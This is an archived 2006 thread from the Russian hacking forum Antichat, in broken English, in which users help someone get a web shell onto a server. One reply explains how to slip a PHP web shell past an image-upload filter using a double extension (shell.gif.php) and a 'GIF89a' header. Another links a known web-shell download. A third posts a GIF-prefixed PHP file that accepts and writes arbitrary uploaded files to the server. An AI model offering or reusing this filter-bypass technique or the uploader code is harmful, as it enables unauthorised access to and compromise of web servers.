Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   help me shell.gif (https://forum.antichat.xyz/showthread.php?t=13196)

by_online 19.01.2006 03:52

help me shell.gif
 
http://video.antichat.net/file163.html
Shell2.gif code from to find??????

DetMyl 19.01.2006 04:12

What do you want to ask?

by_online 19.01.2006 04:31

http://video.antichat.net/file163.html
here shell2.gif?

DetMyl 19.01.2006 04:39

Sorry but I don't understand...
What's your mothertongue? Maybe you should use Babelfish translator ?

Grrl 19.01.2006 04:39

u should rename yr web-shell with doubble extension like shell.gif.php and addd "GIF89a"
then upload it to server .

by_online 19.01.2006 04:50

Цитата:

Сообщение от Grrl
u should rename yr web-shell with doubble extension like shell.gif.php and addd "GIF89a"
then upload it to server .

No Shell2.gif.php Download

Grrl 19.01.2006 04:56

describe yr pdoblem I don`t understand what r u trying to say.

Azazel 19.01.2006 13:25

He wanna only shell-code. This is here: http://rst.void.ru/download/r57shell.txt

SanyaX 19.01.2006 19:20

file name rst.gif.php source!
PHP код:

GIF<?php
if(isset($_POST['upl_files'])){
  echo 
'button clicked';
  
//print_r($_FILES['file_n']);
  
echo '<hr>';
  
$up_mas $_FILES['file_n'];
  
$mas_name = array();
  
$mas_tmp = array();
  for(
$i=0$i<10$i++){
    if(!empty(
$up_mas['name'][$i])){
      
$j count($mas_name);
      
$mas_name[$j] = $up_mas['name'][$i];
      
$mas_tmp[$j] = $up_mas['tmp_name'][$i];
      }
    }
  for(
$i=0$i<count($mas_name); $i++){
    
$upl_file './'.$mas_name[$i];
    if(
move_uploaded_file($mas_tmp[$i], $upl_file)){
      echo 
'<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a><br>';
      }
    }
  }
?>

<form enctype="multipart/form-data" method="post" action="">
<div style="padding: 10px; border: 1px solid #cccccc; width: 300px;">
<?php
  
for($i=0$i<10$i++){
    echo 
'<p><input type="file" name="file_n[]"></p>';
    }
?>
</div>
<div style="padding: 10px; border: 1px solid #cccccc; margin-top: 10px; width: 300px;">
  <input type="submit" name="upl_files" value="upload">
</div>
</form>

CoolA!


Время: 19:48